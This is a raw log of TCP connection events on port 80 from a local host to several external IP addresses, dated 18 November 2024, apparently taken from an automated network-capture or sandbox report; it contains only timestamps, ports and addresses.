                                                                                                      Nov 18, 2024 13:54:17.206448078 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:18.223975897 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:18.229052067 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:18.229151964 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:18.240345001 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:18.245315075 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559350014 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559485912 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559498072 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559509993 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559545040 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.559583902 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559588909 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.559597015 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559607983 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.559709072 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.567527056 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567548990 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567565918 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567580938 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567598104 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567612886 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567629099 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.567658901 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.567658901 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.567718983 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.677917957 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.677939892 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678011894 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678026915 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678041935 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678147078 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.678184986 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.678189039 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.678229094 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685287952 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685345888 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685380936 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685416937 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685586929 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685604095 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685638905 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685750008 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685797930 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.685934067 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.685956001 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.686002970 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.797082901 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797118902 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797138929 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797271967 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.797278881 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797298908 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.797341108 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804282904 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804358959 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804384947 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804404020 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804449081 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804553032 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804656982 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804702044 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.804764032 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804780960 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804799080 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.804825068 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.805146933 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:19.805193901 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.808963060 CET4998680192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:19.813920021 CET8049986208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.210052013 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:25.214952946 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.215122938 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:25.226416111 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:25.231333017 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.871208906 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.903923035 CET8049987149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:25.903981924 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:26.732758045 CET4998780192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.752516985 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.757549047 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:27.757616997 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.766491890 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:27.771816015 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:28.407143116 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:28.439155102 CET8049988149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:28.439248085 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:29.279623032 CET4998880192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.298693895 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.303890944 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:30.304002047 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.315171957 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:30.320193052 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:30.320445061 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:30.969628096 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:31.002310991 CET8049989149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:31.002382994 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:31.826455116 CET4998980192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.845870972 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.850856066 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:32.851633072 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.859011889 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:32.863826990 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:33.513044119 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:33.545675039 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:33.545769930 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:33.546823025 CET4999080192.168.2.5149.115.238.44
                                                                                                      Nov 18, 2024 13:54:33.551585913 CET8049990149.115.238.44192.168.2.5
                                                                                                      Nov 18, 2024 13:54:38.731853008 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:38.736762047 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:38.736831903 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:38.748069048 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:38.752963066 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:39.371241093 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:39.371398926 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:40.264024973 CET4999180192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:40.269069910 CET804999175.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.283164978 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:41.288084030 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.288183928 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:41.299343109 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:41.304337978 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.914705992 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:41.914813995 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:42.811424017 CET4999280192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:42.819204092 CET804999275.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:43.836333036 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:43.842813015 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:43.842900038 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:43.854106903 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:43.859076977 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:43.859910965 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:44.535989046 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:44.536201000 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:45.357868910 CET4999380192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:45.362792015 CET804999375.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:46.376383066 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:46.381597996 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:46.381738901 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:46.388480902 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:46.393426895 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:47.012469053 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:47.012995005 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:47.013061047 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:47.015194893 CET4999480192.168.2.575.2.103.23
                                                                                                      Nov 18, 2024 13:54:47.020198107 CET804999475.2.103.23192.168.2.5
                                                                                                      Nov 18, 2024 13:54:52.048707962 CET4999580192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:52.053761959 CET80499953.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:52.053853035 CET4999580192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:52.064824104 CET4999580192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:52.069856882 CET80499953.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:52.679290056 CET80499953.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:52.679410934 CET4999580192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:53.578764915 CET4999580192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:53.583905935 CET80499953.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:54.596374989 CET4999680192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:54.602369070 CET80499963.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:54.602480888 CET4999680192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:54.616808891 CET4999680192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:54.622983932 CET80499963.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:55.248950958 CET80499963.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:55.249077082 CET4999680192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:56.134670973 CET4999680192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:56.139559031 CET80499963.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:57.145188093 CET4999780192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:57.152477980 CET80499973.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:57.152666092 CET4999780192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:57.172456980 CET4999780192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:57.179555893 CET80499973.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:57.181752920 CET80499973.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:57.793623924 CET80499973.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:57.793693066 CET4999780192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:58.686021090 CET4999780192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:58.691271067 CET80499973.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:59.705054045 CET4999880192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:59.710789919 CET80499983.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:54:59.710918903 CET4999880192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:59.718556881 CET4999880192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:54:59.723505974 CET80499983.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:55:00.342716932 CET80499983.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:55:00.343516111 CET80499983.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:55:00.343672991 CET4999880192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:55:00.346900940 CET4999880192.168.2.53.33.130.190
                                                                                                      Nov 18, 2024 13:55:00.351820946 CET80499983.33.130.190192.168.2.5
                                                                                                      Nov 18, 2024 13:55:05.404695034 CET4999980192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:05.409957886 CET8049999203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:05.410051107 CET4999980192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:05.421433926 CET4999980192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:05.426595926 CET8049999203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:06.129165888 CET8049999203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:06.170219898 CET4999980192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:06.183731079 CET8049999203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:06.183849096 CET4999980192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:06.935821056 CET4999980192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:07.955260038 CET5000080192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:07.960688114 CET8050000203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:07.960810900 CET5000080192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:07.971286058 CET5000080192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:07.976290941 CET8050000203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:08.683794022 CET8050000203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:08.732594013 CET5000080192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:08.738586903 CET8050000203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:08.738652945 CET5000080192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:09.482729912 CET5000080192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:10.501940012 CET5000180192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:10.506807089 CET8050001203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:10.506907940 CET5000180192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:10.517643929 CET5000180192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:10.522536039 CET8050001203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:10.524557114 CET8050001203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:11.227847099 CET8050001203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:11.279588938 CET5000180192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:11.282800913 CET8050001203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:11.282902956 CET5000180192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:12.029649973 CET5000180192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:13.048471928 CET5000280192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:13.054992914 CET8050002203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:13.055120945 CET5000280192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:13.062254906 CET5000280192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:13.068840027 CET8050002203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:13.767194033 CET8050002203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:13.810779095 CET5000280192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:13.821851015 CET8050002203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:13.822015047 CET5000280192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:13.822921038 CET5000280192.168.2.5203.161.49.193
                                                                                                      Nov 18, 2024 13:55:13.827910900 CET8050002203.161.49.193192.168.2.5
                                                                                                      Nov 18, 2024 13:55:18.847678900 CET5000380192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:18.852642059 CET8050003104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:18.852772951 CET5000380192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:18.863425016 CET5000380192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:18.868442059 CET8050003104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:20.373450041 CET5000380192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:20.378964901 CET8050003104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:20.379029989 CET5000380192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:21.391818047 CET5000480192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:21.396856070 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:21.397015095 CET5000480192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:21.405524015 CET5000480192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:21.410677910 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:22.916084051 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:22.916368961 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:22.916474104 CET5000480192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:22.916515112 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:22.917190075 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:22.917202950 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:22.917213917 CET8050004104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:22.917253971 CET5000480192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:22.917299986 CET5000480192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:22.920196056 CET5000480192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:23.939150095 CET5000580192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:23.944231987 CET8050005104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:23.944346905 CET5000580192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:23.955598116 CET5000580192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:23.960619926 CET8050005104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:23.960696936 CET8050005104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:25.468482018 CET5000580192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:25.474467993 CET8050005104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:25.474555969 CET5000580192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:26.485766888 CET5000680192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:26.490812063 CET8050006104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:26.490899086 CET5000680192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:26.498333931 CET5000680192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:26.503797054 CET8050006104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:28.069297075 CET8050006104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:28.069547892 CET8050006104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:28.069698095 CET5000680192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:28.071367025 CET8050006104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:28.071429968 CET5000680192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:28.072390079 CET5000680192.168.2.5104.21.74.79
                                                                                                      Nov 18, 2024 13:55:28.077346087 CET8050006104.21.74.79192.168.2.5
                                                                                                      Nov 18, 2024 13:55:33.106101036 CET5000780192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:33.110965014 CET805000715.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:33.111043930 CET5000780192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:33.123099089 CET5000780192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:33.128027916 CET805000715.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:33.729693890 CET805000715.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:33.729769945 CET5000780192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:34.639086008 CET5000780192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:34.644387960 CET805000715.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:35.657759905 CET5000880192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:35.662785053 CET805000815.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:35.663723946 CET5000880192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:35.674618959 CET5000880192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:35.679514885 CET805000815.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:36.295877934 CET805000815.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:36.299877882 CET5000880192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:37.185923100 CET5000880192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:37.191220045 CET805000815.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:38.205210924 CET5000980192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:38.210892916 CET805000915.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:38.211014032 CET5000980192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:38.222404003 CET5000980192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:38.227807999 CET805000915.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:38.227822065 CET805000915.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:38.839082956 CET805000915.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:38.839198112 CET5000980192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:39.732949018 CET5000980192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:39.738060951 CET805000915.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:40.752077103 CET5001080192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:40.757215977 CET805001015.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:40.757307053 CET5001080192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:40.764621019 CET5001080192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:40.769779921 CET805001015.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:41.384526014 CET805001015.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:41.384598017 CET805001015.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:41.385026932 CET5001080192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:41.387593031 CET5001080192.168.2.515.197.204.56
                                                                                                      Nov 18, 2024 13:55:41.392616987 CET805001015.197.204.56192.168.2.5
                                                                                                      Nov 18, 2024 13:55:46.438031912 CET5001180192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:46.443018913 CET8050011188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:46.443134069 CET5001180192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:46.453429937 CET5001180192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:46.458389997 CET8050011188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:47.418620110 CET8050011188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:47.418767929 CET8050011188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:47.418869972 CET5001180192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:47.420593977 CET8050011188.114.97.3192.168.2.5
                                                                                                      Nov 18, 2024 13:55:47.420684099 CET5001180192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:47.967088938 CET5001180192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:48.986998081 CET5001280192.168.2.5188.114.97.3
                                                                                                      Nov 18, 2024 13:55:48.992192030 CET8050012188.114.97.3192.168.2.5
